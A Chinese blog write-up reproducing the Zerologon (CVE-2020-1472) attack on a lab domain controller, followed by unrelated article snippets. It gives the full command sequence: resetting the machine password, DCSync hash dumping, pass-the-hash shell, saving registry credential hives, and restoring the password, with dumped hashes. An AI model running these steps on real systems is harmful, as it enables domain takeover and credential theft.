这是什么娃哈哈
这是什么娃哈哈

NetLogon 域内提权漏洞(CVE-2020-1472)

NetLogon 域内提权漏洞(CVE-2020-1472)复现

摘要

2020年08月12日,Windows官方 发布了 NetLogon 特权提升漏洞 的风险通告,该漏洞编号为 CVE-2020-1472,漏洞等级:严重,漏洞评分:10分

攻击者通过NetLogon(MS-NRPC),建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行经特殊设计的应用程序

影响版本

Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)

复现环境

版本: Windows Server 2012
IP: 10.99.99.253
Blosname: OWA2013   (域控的主机名)

漏洞脚本

impacket               https://github.com/SecureAuthCorp/impacket
重置域内管理员密码poc    https://github.com/dirkjanm/CVE-2020-1472
恢复密码poc             https://github.com/risksense/zerologon

复现开始

首先使用exp重置管理员密钥

python3 cve-2020-1472-exploit.py OWA2013 10.99.99.253

通过 Dcsync获取域内所有有用户hash

python3 secretsdump.py rootkit/OWA2013\$@10.99.99.253 -just-dc -no-pass

得到了域控的 Hash:

rootkit.org\Administrator:500:aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c:::

通过 wmic hash 传递获取shell:

python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c rootkit.org/Administrator@10.99.99.253

通过导出 sam system 等文件到本地,获取域控机器上本地保存之前的 hash 值用于恢复,不然就脱域了:

备份注册表

导出注册表文件
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save

将文件下载到本地
get system.save
get sam.save
get security.save

删除文件
del /f system.save
del /f sam.save
del /f security.save

之后你会发现再你的当前机器会生成几个文件:sam.save、security.save、system.save


之后通过 sam.save、security.save、system.save 这些文件获得原来域控机器上的 Ntlm Hash 值,用于恢复密码:

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

通过拿到 $MACHINE.ACC: 的值,然后进行恢复(注意只有后半部分)

$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:7e304360db8cdb95d09a960607fcc526

恢复密码

python3 reinstall_original_pw.py OWA2013 10.99.99.253 7e304360db8cdb95d09a960607fcc526

验证是否恢复密码成功

python3 secretsdump.py rootkit/OWA2013\$@10.99.99.253 -just-dc -no-pass

你可能感兴趣的:(NetLogon 域内提权漏洞(CVE-2020-1472))

  • 关于使用Java语言编写打地鼠游戏 倾听一世,繁花盛开 Java语言打地鼠游戏开发语言eclipsespring
    用Java语言书写打地鼠游戏关于游戏的介绍《打地鼠游戏》Java代码的实现PlayMouse.javaStartGame.javaMusicPlay.javaMusicPlayTest.java游戏所需图片运行效果结言关于游戏的介绍打地鼠游戏是一款非常受欢迎的敏捷类游戏,它的基本规则简单易懂,同时又充满了挑战性和趣味性。在游戏中,玩家通常需要在一个方形区域内,面对多个地洞,这些地洞中会不定时地冒出
  • Lab17_ Blind SQL injection with out-of-band data exfiltration 远川_Horizon web安全sql
    文章目录前言:进入实验室构造payload前言:实验室标题为:带外数据泄露的SQL盲注简介:本实验包含一个SQL盲目注入漏洞。应用程序使用跟踪Cookie进行分析,并执行包含提交的Cookie值的SQL查询。SQL查询是异步执行的,对应用程序的响应没有影响。但是,您可以触发与外部域的带外交互。该数据库包含一个名为users的表,其中的列名为username和password。您需要利用SQL盲目注
  • 《“漏洞克星”集结令:Java实战派+安全极客,为Z世代打造技术诺亚方舟!》 ELIHU_han 安全开发java网络安全安全web安全计算机网络安全威胁分析系统安全
    【急聘!】Java全栈&安全开发勇士集结!和大学生/IT人一起搞事情,不卷只燃!#Java开发#安全工程师#初创团队招聘#大学生创业我们是谁?我们是一支“小而悍”的极客小队,正在打造一款面向在校大学生和IT新人的技术实战平台!(偷偷剧透:用Java写核心,用安全护数据,用开源搞事情!)拒绝大厂式内卷,专注用代码解决真实痛点。如果你也想“从0到1”参与产品诞生,这里就是你的战场!我们需要这样的你!1
  • 侯捷 C++ 课程学习笔记:C++面向对象开发 『六哥』 C++学习笔记
    学习C++面向对象开发需要具备一些基础。学习过某种proceduurallanguage(C语言最佳)了解变量(variables)、类型(types)、作用域(scope)、循环(loops)、流程控制。知道一个程序需要编译才能被执行。以良好的方式编写C++class是一种基于对象(ObjectBased)classwithoutpointermembers——Complex带指针classwi
  • 2024年CRM系统全景:领先品牌的深度解析与企业选择指南 新增长SaaS点评 云计算人工智能大数据业界资讯crm客户关系管理
    在SaaS赛道中,CRM系统以其与交易的紧密联系和迅猛的发展势头,成为核心的竞争领域。根据艾媒咨询的最新数据,2021年中国CRM市场规模达到156亿元,同比增长16.5%。随着市场渗透率的提高以及社交化、智能化CRM解决方案的不断涌现,行业增长势头强劲。预计从2023年起,市场将以大约10%的年增长率稳健前行,未来三年内市场规模有望增加百亿,到2024年总规模将突破250亿元大关。《2024全国
  • IBUF和BUFG 起床学FPGA fpga开发
    在代码中,DATA_IN和CLK_IN都通过IBUF实例进行缓冲。IBUF负责将外部信号转换到FPGA内部标准并驱动内部信号线。这不仅在物理上是必要的一步(没有IBUF就无法直接驱动内部逻辑),而且还允许我们指定引脚的约束(如电平标准等)。BUFG全局时钟缓冲:bufg_clk实例将时钟连接到了全局时钟网络。这样做的直接好处是降低时钟的偏斜(skew)和抖动(jitter)。时钟偏斜指FPGA内不
  • 网络安全工具汇总 Hacker_Fuchen web安全安全
    网络安全工具汇总漏洞及渗透练习平台WebGoat漏洞练习环境https://github.com/WebGoat/WebGoathttps://github.com/WebGoat/WebGoat-LegacyDamnVulnerableWebApplication(漏洞练习平台)https://github.com/RandomStorm/DVWA数据库注入练习平台https://github.
  • 网络安全 api 网络安全 ast技术 Hacker_LaoYi web安全githubgit
    随着应用或者API被攻击利用已经越来越多,虽然来自开源组件的漏洞加剧了这一现象的发生,但是,其实主要还是在于应用程序或者API本身没有做好防范,根源在于源代码本身的质量没有严格把控。AST是指ApplicationSecurityTesting,主要包括静态应用测试(SAST)、交互式应用测试(IAST)、动态应用测试(DAST)以及软件成分分析(SCA)等工具。应用测试工具AST是专门用于检测源
  • 科技早报 | B站崩了、小红书崩了上热搜;OpenSSH漏洞预警:无需用户交互,可提权至 root | 最新快讯 最新科技快讯 量子计算
    本源量子与中国联通签署战略合作协议7月2日,本源量子计算科技(合肥)股份有限公司与中国联合网络通信有限公司签署了战略合作协议。根据协议,双方将携手探索中国自主量子算力在通信领域的应用,致力于推动中国通信事业的创新发展。这一合作标志着双方将在量子技术与通信行业的深度融合上展开实质性合作,共同加速相关技术成果转化和市场拓展。消息称谷歌TensorG5芯片已流片,预计采用3nm制摘要:谷歌下一代Tens
  • 两篇题解——理想的正方形deepseek做法 Cool_(wly)_Dino deepseek算法数据结构c++学习开发语言
    嗯,这道题看起来是要找一个n×n的正方形区域,使得该区域内最大值和最小值的差最小。那我得仔细看看题目要求。题目给了一个a×b的矩阵,要从中找出所有可能的n×n正方形,然后计算每个这样的正方形的max-min,最后取所有中的最小值。首先,我得想到怎么高效地计算每个n×n窗口的最大和最小值。因为直接遍历每个窗口然后找最大和最小的话,时间复杂度会很高。比如a和b都是1000的话,n是100的话,这样的窗
  • ENSP综合实验题 JioJio~z 网络
    1.关于192.168.1.0/24的广播域有14个,所以,192.168.1.00000000/28由2的4次方=16种,分配如下:2.根据以上分配配接口IP,配环回接口IP;3.根据静态路由配置非直连路由,每一个路由器配置其他路由信息,例如R1配置完毕的路由表:4.此时几个路由器间可以Ping通了,根据要求3得知,R1—R4需要配置一个指向5.5.5.0/24的缺省路由,例如Ping通后如下:
  • C语言函数原型的作用 CLOUD_FL C函数原型函数声明作用
    函数原型(FunctionPrototype):即函数声明给出了函数名、返回值类型、参数列表(重点是参数类型)等与该函数有关的信息。函数原型的作用:告诉编译器与该函数有关的信息,让编译器知道函数的存在,以及存在的形式,即使函数暂时没有定义,编译器也知道如何使用它。有了函数声明,函数定义就可以出现在任何地方了,甚至是其他文件、静态链接库、动态链接库等。但是如果函数本身带static修饰,那么作用域是
  • C语言数据结构:链表的操作实现 晨曦学习日记 数据结构c语言链表
    本文包括链表的基本操作:初始化、头插法、尾插法、遍历打印、获取尾结点地址、指定位置添加和删除结点、获取链表长度、得到尾指针、释放链表、获得倒数第K个结点的值(快慢指针法)、翻转链表。在链表的学习中(个人觉得)我们需要注意的几点:1、结点类型声明的格式,指针域不可以使用别名取声明,2、指针域的熟悉,要懂得L->next的含义,看到后知道其内容是什么意思。3、循环的临界条件判断,需要多次写代码去熟悉。
  • C++学习——栈(一) Mentality瑞 C++c++学习开发语言
    文章目录前言一、顺序表实现栈二、链表实现栈三、C++STL中的栈四、C++中的:和::的区别1.单冒号(:)的用法(1)初始化列表(构造函数)(2)继承声明(3)访问控制符(4)位域(Bit-field)2.双冒号(::)的用法(1)作用域解析(2)静态成员访问(3)命名空间访问(4)全局函数调用3.核心区别与注意事项4.总结前言本文为《C++学习》的第3篇文章,今天学习栈。一、顺序表实现栈#in
  • 二叉树,满二叉树,完全二叉树...... @ANONYME 算法数据结构c语言
    二叉树(BinaryTree)二叉树是一种树形结构,其中每个节点最多有两个子节点,分别称为左子节点和右子节点。二叉树的节点包含三个部分:数据域、指向左子节点的指针和指向右子节点的指针。特性每个节点最多有两个子节点。左子树(如果存在)为根结点的左子节点。右子树(如果存在)为根结点的右子节点。左子树和右子树本身也都是二叉树。相关性质:深度:一棵二叉树的最大层数称为这棵树的深度。空树的深度为0;只有一个
  • 设计模式之中介者模式 Forget the Dream 设计模式设计模式中介者模式javac++
    引言某个工作日的早晨,小A发现楼栋电梯停运了。他打开物业小程序提交报修单,短短10分钟后,楼栋公告屏就亮起了提示:“电梯故障已受理,预计2小时内修复”。这看似简单的流程背后,隐藏着一个精密的协作系统:物业中心在收到报修后同步触发:生成维修工单(自动派发给签约维保公司)启动临时安保预案(通知巡逻岗重点监控3栋)推送进度通知(居民小程序/短信/公告屏三端同步)维修完成时,系统继续联动:关闭电梯警示标识
  • Manus:一场颠覆认知的AI Agent革命,重新定义人机协作范式 大禹智库 《实战AI智能体》人工智能RAGAI智能体Manus智能体
    一、凌晨三点引爆科技圈:AIAgent的"iPhone时刻"降临2024年3月6日,当全球目光聚焦苹果新品发布会时,科技圈却因另一场革命彻夜未眠——Monica.im团队打造的AIAgent产品Manus以摧枯拉朽之势席卷社交平台。在硅谷VC机构的Slack群组里,投资人争相分享邀请码获取攻略;知乎"如何看待Manus"话题1小时内突破百万浏览;推特#ManusRevolution标签下,科技大V
  • 广工anyview数据结构第六章676869 L比8伯 数据结构
    DC06PE67试写一非递归算法,在二叉查找树T中插入元素e。二叉查找树的类型BSTree定义如下typedefstructfKeyTypekey;//其他数据域TElemType;typedefstructBSTNodefTElemTypedata;structBSTNode*lchild,*rchild;BSTNode,*BSTree;实现下列函数StatusInsertBSTI(BSTree
  • 1998-2022年各地级市第一产业占GDP比重/地级市第一产业占比数据(市辖区) m0_71334485 数据#地级市地级市第一产业占GDP比重地级市第一产业占比
    1998-2022年各地级市第一产业占GDP比重/地级市第一产业占比数据(市辖区)1、时间:1998-2022年2、指标:地级市第一产业占GDP比重/地级市第一产业占比3、来源:城市统计年鉴4、范围:299个地级市5、缺失情况:缺失情况与年鉴一致,表内附有年鉴第一产业占比原始数据,以2022年地级市名单进行统计整理,为市辖区数据6、下载链接:1998-2022年各地级市第一产业占GDP比重/地级市
  • TCP通信-支持服务端与多个客户端同时通信 冷眼热眸 JAVA语言tcp/ip网络服务器网络协议java
    在上一篇文章中,我展示了基于TCP通信协议的客户端与服务端进行通信,但是只能有一个客户端与服务端进行通信,详情请点击括号内的文章(UDP传输协议和TCP传输协议的解释和实例)。本篇文章讲述;基于多线程实现多个客户端与服务端同时通信,且附有代码的注解。客户端代码如下(Client)packagecom.itheima_tcp;importjava.io.DataOutputStream;import
  • 十一、宏定义 安庆平.Я C/C++语言总结算法c语言数据结构
    11.1不带参宏定义一般形式:#define宏名宏体一般定义在函数外部,可在任意处定义#undef宏名//可终止宏名的作用域引号中的内容与宏名相同也不置换功能(宏展开):预编译时,用宏体替换宏名----不作语法检查生命周期:从声明处开始,若无#undef,则到程序终止为止,反之,则在#undef处结束宏定义可以嵌套,不能递归宏定义时,需要使用必要的括号----宏展开为不作语法检查的展开,若无括号,
  • OpenManus:快速复刻Manus项目的技术路径与实施策略 花生糖@ manusopenmanusAI开源人工智能
    一、敏捷复刻的工程化基础1.1架构解耦设计OpenManus采用"微内核+插件"架构模式,其核心引擎仅保留智能体调度、消息路由等基础功能,将模型接入、任务处理等模块进行组件化封装。这种设计使得复刻项目时能够快速剥离非必要模块,例如:模块替换:通过修改config.toml的llm配置段,可在1小时内完成从GPT-4到Claude3的模型切换功能裁剪:删除vision模块相关代码及配置项即可实现15
  • nas服务器系列,机架式nas新选择 篇一:小型存储服务器硬件挑选 mogego七海 nas服务器系列
    机架式nas新选择篇一:小型存储服务器硬件挑选2020-12-2321:26:2966点赞334收藏88评论前言自己组建家用nas折腾也有一段时日了,从矿难以来的暴风酷云,蜗牛等一众热门的小型nas机器,再到退烧后入了白群晖做家里数据的备份中心,其实一直对心目中的nas需求大致也没太大变化,稳定安全地存储数据为主要,并尽量在合理的功耗和预算范围内,正巧前段时间沉迷于研究各类成品服务器并时不时逛下s
  • OpenCV计算摄影学(16)调整图像光照效果函数illuminationChange() 村北头的码农 OpenCVopencv人工智能计算机视觉
    操作系统:ubuntu22.04OpenCV版本:OpenCV4.9IDE:VisualStudioCode编程语言:C++11算法描述对选定区域内的梯度场应用适当的非线性变换,然后通过泊松求解器重新积分,可以局部修改图像的表观照明。cv::illuminationChange是OpenCV中用于调整图像光照效果的一个函数。通过这个函数,你可以修改图像中的光照分布,以达到改善图像视觉效果或者为图像
  • Web网站漏洞扫描与渗透攻击 嗨起飞了 网络安全网络安全web安全
    Web网站漏洞扫描与渗透攻击工具全解析:从防御者到攻击者的双重视角网络安全是永无止境的攻防博弈前言:数字世界的攻守之道在数字化转型的浪潮中,Web应用已成为网络攻击的主要目标。根据CybersecurityVentures的统计,2023年全球因网络攻击导致的经济损失预计突破8万亿美元。作为开发者或安全工程师,了解常见漏洞扫描工具和渗透测试技术已成为必备技能。本文将从防御和攻击双重视角,深入剖析主
  • 黑客入门手册 嗨起飞了 网络安全网络攻击模型网络安全
    零基础入门网络安全:黑客技术学习路线与实战手册摘要:本文面向网络安全初学者,系统化拆解黑客技术学习路径,涵盖基础理论、实战工具和代码实例。内容遵循合法合规原则,仅用于技术研究。一、黑客技术学习的认知前提1.1什么是真正的"黑客"黑客精神的核心:探索系统原理与漏洞本质白帽/灰帽/黑帽的伦理边界(以《网络安全法》为准则)1.2学习前的法律警示渗透测试授权原则虚拟机实验环境搭建的重要性推荐工具:VMwa
  • 巨坑之Can‘t resolve ‘./App.vue‘ in ‘/app/src‘ Yan_an_n npmvue.js前端
    问题报错:前因后果:项目本地打包的时候都没有问题,但是在公司部署的jenkins里打包就出现了如上问题,尝试将文件APP.vue的路径修改,本地打包成功,但是jenkins打包仍然有问题,后来问了有经验的前端才知道问题原因:main.js文件内引入app.vue是importAppfrom'./App'importrouterfrom'./router'import*asaxiosfrom'./a
  • 在协议中,语义感知能力 海青橘 论文阅读笔记论文术语
    在协议(如网络协议、数据格式协议等)的上下文中,语义感知能力指的是系统对协议数据(如报文、字段、交互流程等)实际含义和逻辑关联的理解能力,而不仅仅是语法层面的合规性检查。这种能力使系统能够根据协议设计的意图、业务逻辑或潜在漏洞模式,智能地生成、解析或测试协议数据。协议中语义感知能力的核心要素协议结构理解能力:解析协议的格式规范(如HTTP头、JSON键值对、TCP握手流程),识别字段的功能角色(如
  • AI与机器学习、深度学习在气候变化预测中的应用 weixin_贾 农业模型气象人必备模型人工智能机器学习深度学习气候数据预测气候变化趋势农业生产气溶胶
    全球气候变化是现代社会面临的最重要的环境挑战之一,影响了气温、降水、海平面、农业、生态系统等多个方面。气候变化的驱动因素主要包括温室气体排放、气溶胶浓度、火灾频发、海冰融化、叶绿素变化、农业变化和生态环境变化等。这些因素在全球范围内交互作用,导致复杂的气候变化模式。将学习如何应用ChatGPT、Deepseek辅助Python编程、学习如何下载处理NASA卫星、CMIP6数据。通过机器学习(K-m
  • 6G天地一体化信息网络内生安全技术 罗思付之技术屋 网络通信安全及科学技术专栏安全
    摘要:6G天地一体化信息网络面临因网络高度暴露、节点高速运动、计算资源受限等特点带来的安全挑战,且新架构、新应用、新技术也将引入新的安全问题,亟须提出普适性安全理论,一体化解决其功能安全及网络安全问题。为此,首先阐述网络空间内生安全主要理论基础,提出6G天地一体化信息网络内生安全架构;然后,在网络空间内生安全理论的指导下,从星载系统、6G地面移动网、星地链路探讨相关安全理论与技术构想;最后,从安全
  • TOMCAT在POST方法提交参数丢失问题 357029540 javatomcatjsp
    摘自http://my.oschina.net/luckyi/blog/213209 昨天在解决一个BUG时发现一个奇怪的问题,一个AJAX提交数据在之前都是木有问题的,突然提交出错影响其他处理流程。 检查时发现页面处理数据较多,起初以为是提交顺序不正确修改后发现不是由此问题引起。于是删除掉一部分数据进行提交,较少数据能够提交成功。 恢复较多数据后跟踪提交FORM DATA ,发现数
  • 在MyEclipse中增加JSP模板 删除-2008-08-18 ljy325 jspxmlMyEclipse
    在D:\Program Files\MyEclipse 6.0\myeclipse\eclipse\plugins\com.genuitec.eclipse.wizards_6.0.1.zmyeclipse601200710\templates\jsp  目录下找到Jsp.vtl,复制一份,重命名为jsp2.vtl,然后把里面的内容修改为自己想要的格式,保存。 然后在 D:\Progr
  • JavaScript常用验证脚本总结 eksliang JavaScriptjavaScript表单验证
         转载请出自出处:http://eksliang.iteye.com/blog/2098985        下面这些验证脚本,是我在这几年开发中的总结,今天把他放出来,也算是一种分享吧,现在在我的项目中也在用!包括日期验证、比较,非空验证、身份证验证、数值验证、Email验证、电话验证等等...! &nb
  • 微软BI(4) 18289753290 微软BI SSIS
    1) Q:查看ssis里面某个控件输出的结果:  A MessageBox.Show(Dts.Variables["v_lastTimestamp"].Value.ToString()); 这是我们在包里面定义的变量 2):在关联目的端表的时候如果是一对多的关系,一定要选择唯一的那个键作为关联字段。 3) Q:ssis里面如果将多个数据源的数据插入目的端一
  • 定时对大数据量的表进行分表对数据备份 酷的飞上天空 大数据量
    工作中遇到数据库中一个表的数据量比较大,属于日志表。正常情况下是不会有查询操作的,但如果不进行分表数据太多,执行一条简单sql语句要等好几分钟。。   分表工具:linux的shell + mysql自身提供的管理命令 原理:使用一个和原表数据结构一样的表,替换原表。   linux shell内容如下: =======================开始 
  • 本质的描述与因材施教 永夜-极光 感想随笔
             不管碰到什么事,我都下意识的想去探索本质,找寻一个最形象的描述方式。        我坚信,世界上对一件事物的描述和解释,肯定有一种最形象,最贴近本质,最容易让人理解        &
  • 很迷茫。。。 随便小屋 随笔
    小弟我今年研一,也是从事的咱们现在最流行的专业(计算机)。本科三流学校,为了能有个更好的跳板,进入了考研大军,非常有幸能进入研究生的行业(具体学校就不说了,怕把学校的名誉给损了)。   先说一下自身的条件,本科专业软件工程。主要学习就是软件开发,几乎和计算机没有什么区别。因为学校本身三流,也就是让老师带着学生学点东西,然后让学生毕业就行了。对专业性的东西了解的非常浅。就那学的语言来说
  • 23种设计模式的意图和适用范围 aijuans 设计模式
    Factory Method 意图 定义一个用于创建对象的接口,让子类决定实例化哪一个类。Factory Method 使一个类的实例化延迟到其子类。   适用性 当一个类不知道它所必须创建的对象的类的时候。   当一个类希望由它的子类来指定它所创建的对象的时候。   当类将创建对象的职责委托给多个帮助子类中的某一个,并且你希望将哪一个帮助子类是代理者这一信息局部化的时候。 Abstr
  • Java中的synchronized和volatile aoyouzi javavolatilesynchronized
    说到Java的线程同步问题肯定要说到两个关键字synchronized和volatile。说到这两个关键字,又要说道JVM的内存模型。JVM里内存分为main memory和working memory。 Main memory是所有线程共享的,working memory则是线程的工作内存,它保存有部分main memory变量的拷贝,对这些变量的更新直接发生在working memo
  • js数组的操作和this关键字 百合不是茶 js数组操作this关键字
    js数组的操作;   一:数组的创建: 1、数组的创建 var array = new Array(); //创建一个数组 var array = new Array([size]); //创建一个数组并指定长度,注意不是上限,是长度 var arrayObj = new Array([element0[, element1[, ...[, elementN]]]
  • 别人的阿里面试感悟 bijian1013 面试分享工作感悟阿里面试
    原文如下:http://greemranqq.iteye.com/blog/2007170         一直做企业系统,虽然也自己一直学习技术,但是感觉还是有所欠缺,准备花几个月的时间,把互联网的东西,以及一些基础更加的深入透析,结果这次比较意外,有点突然,下面分享一下感受吧!    &nb
  • 淘宝的测试框架Itest Bill_chen springmaven框架单元测试JUnit
    Itest测试框架是TaoBao测试部门开发的一套单元测试框架,以Junit4为核心, 集合DbUnit、Unitils等主流测试框架,应该算是比较好用的了。 近期项目中用了下,有关itest的具体使用如下: 1.在Maven中引入itest框架: <dependency>   <groupId>com.taobao.test</groupId&g
  • 【Java多线程二】多路条件解决生产者消费者问题 bit1129 java多线程
    package com.tom; import java.util.LinkedList; import java.util.Queue; import java.util.concurrent.ThreadLocalRandom; import java.util.concurrent.locks.Condition; import java.util.concurrent.loc
  • 汉字转拼音pinyin4j 白糖_ pinyin4j
    以前在项目中遇到汉字转拼音的情况,于是在网上找到了pinyin4j这个工具包,非常有用,别的不说了,直接下代码:   import java.util.HashSet; import java.util.Set; import net.sourceforge.pinyin4j.PinyinHelper; import net.sourceforge.pinyin
  • org.hibernate.TransactionException: JDBC begin failed解决方案 bozch ssh数据库异常DBCP
    org.hibernate.TransactionException: JDBC begin failed:     at org.hibernate.transaction.JDBCTransaction.begin(JDBCTransaction.java:68)    at org.hibernate.impl.SessionImp
  • java-并查集(Disjoint-set)-将多个集合合并成没有交集的集合 bylijinnan java
    import java.util.ArrayList; import java.util.Arrays; import java.util.HashMap; import java.util.HashSet; import java.util.Iterator; import java.util.List; import java.util.Map; import java.ut
  • Java PrintWriter打印乱码 chenbowen00 java
    一个小程序读写文件,发现PrintWriter输出后文件存在乱码,解决办法主要统一输入输出流编码格式。 读文件: BufferedReader 从字符输入流中读取文本,缓冲各个字符,从而提供字符、数组和行的高效读取。 可以指定缓冲区的大小,或者可使用默认的大小。大多数情况下,默认值就足够大了。 通常,Reader 所作的每个读取请求都会导致对基础字符或字节流进行相应的读取请求。因
  • [天气与气候]极端气候环境 comsci 环境
          如果空间环境出现异变...外星文明并未出现,而只是用某种气象武器对地球的气候系统进行攻击,并挑唆地球国家间的战争,经过一段时间的准备...最大限度的削弱地球文明的整体力量,然后再进行入侵......      那么地球上的国家应该做什么样的防备工作呢?  &n
  • oracle order by与union一起使用的用法 daizj UNIONoracleorder by
    当使用union操作时,排序语句必须放在最后面才正确,如下: 只能在union的最后一个子查询中使用order by,而这个order by是针对整个unioning后的结果集的。So: 如果unoin的几个子查询列名不同,如 Sql代码  select supplier_id, supplier_name  from suppliers  UNI
  • zeus持久层读写分离单元测试 deng520159 单元测试
    本文是zeus读写分离单元测试,距离分库分表,只有一步了.上代码: 1.ZeusMasterSlaveTest.java package com.dengliang.zeus.webdemo.test; import java.util.ArrayList; import java.util.List; import org.junit.Assert; import org.j
  • Yii 截取字符串(UTF-8) 使用组件 dcj3sjt126com yii
    1.将Helper.php放进protected\components文件夹下。 2.调用方法:   Helper::truncate_utf8_string($content,20,false);   //不显示省略号  Helper::truncate_utf8_string($content,20);  //显示省略号  &n
  • 安装memcache及php扩展 dcj3sjt126com PHP
    安装memcache    tar zxvf memcache-2.2.5.tgz     cd memcache-2.2.5/     /usr/local/php/bin/phpize (?)    ./configure --with-php-confi
  • JsonObject 处理日期 feifeilinlin521 javajsonJsonOjbectJsonArrayJSONException
        写这边文章的初衷就是遇到了json在转换日期格式出现了异常 net.sf.json.JSONException: java.lang.reflect.InvocationTargetException  原因是当你用Map接收数据库返回了java.sql.Date 日期的数据进行json转换出的问题话不多说  直接上代码  &n
  • Ehcache(06)——监听器 234390216 监听器listenerehcache
    监听器          Ehcache中监听器有两种,监听CacheManager的CacheManagerEventListener和监听Cache的CacheEventListener。在Ehcache中,Listener是通过对应的监听器工厂来生产和发生作用的。下面我们将来介绍一下这两种类型的监听器。  
  • activiti 自带设计器中chrome 34版本不能打开bug的解决 jackyrong Activiti
      在acitivti modeler中,如果是chrome 34,则不能打开该设计器,其他浏览器可以, 经证实为bug,参考 http://forums.activiti.org/content/activiti-modeler-doesnt-work-chrome-v34 修改为,找到 oryx.debug.js 在最头部增加 if (!Document.
  • 微信收货地址共享接口-终极解决 laotu5i0 微信开发
       最近要接入微信的收货地址共享接口,总是不成功,折腾了好几天,实在没办法网上搜到的帖子也是骂声一片。我把我碰到并解决问题的过程分享出来,希望能给微信的接口文档起到一个辅助作用,让后面进来的开发者能快速的接入,而不需要像我们一样苦逼的浪费好几天,甚至一周的青春。各种羞辱、谩骂的话就不说了,本人还算文明。    如果你能搜到本贴,说明你已经碰到了各种 ed
  • 关于人才 netkiller.github.com 工作面试招聘netkiller人才
    关于人才 每个月我都会接到许多猎头的电话,有些猎头比较专业,但绝大多数在我看来与猎头二字还是有很大差距的。 与猎头接触多了,自然也了解了他们的工作,包括操作手法,总体上国内的猎头行业还处在初级阶段。 总结就是“盲目推荐,以量取胜”。 目前现状 许多从事人力资源工作的人,根本不懂得怎么找人才。处在人才找不到企业,企业找不到人才的尴尬处境。 企业招聘,通常是需要用人的部门提出招聘条件,由人
  • 搭建 CentOS 6 服务器 - 目录 rensanning centos
    (1) 安装CentOS ISO(desktop/minimal)、Cloud(AWS/阿里云)、Virtualization(VMWare、VirtualBox) 详细内容 (2) Linux常用命令 cd、ls、rm、chmod...... 详细内容 (3) 初始环境设置 用户管理、网络设置、安全设置...... 详细内容 (4) 常驻服务Daemon
  • 【求助】mongoDB无法更新主键 toknowme mongodb
      Query query = new Query();          query.addCriteria(new Criteria("_id").is(o.getId()));                &n
  • jquery 页面滚动到底部自动加载插件集合 xp9802 jquery
    很多社交网站都使用无限滚动的翻页技术来提高用户体验,当你页面滑到列表底部时候无需点击就自动加载更多的内容。下面为你推荐 10 个 jQuery 的无限滚动的插件: 1. jQuery ScrollPagination jQuery ScrollPagination plugin 是一个 jQuery 实现的支持无限滚动加载数据的插件。 2. jQuery Screw S
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他